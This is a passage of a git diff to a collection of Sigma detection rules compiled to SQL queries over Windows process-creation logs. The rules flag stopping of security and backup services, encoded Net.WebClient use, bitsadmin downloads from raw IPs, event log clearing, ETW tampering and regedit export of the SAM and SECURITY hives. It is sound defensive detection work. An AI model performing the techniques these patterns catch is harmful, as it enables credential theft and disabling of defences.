'%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL 
Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR 
CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' 
ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR 
CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE 
'%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE 
'%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "status": "test", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + 
"attack.t1059", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": 
"proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", - "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "status": "test", + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { "title": "Potential Windows Defender Tampering Via Wmic.EXE", 
@@ -7508,765 +7293,738 @@ "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", - "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "status": "stable", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE 
'%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. 
This could be used to establish persistence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "Legitimate software creating script event consumers" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + }, + { + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1543.003" + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' 
OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. 
backup or forensic investigation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "description": "Detects the use of SDelete to erase a file not the free space", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + 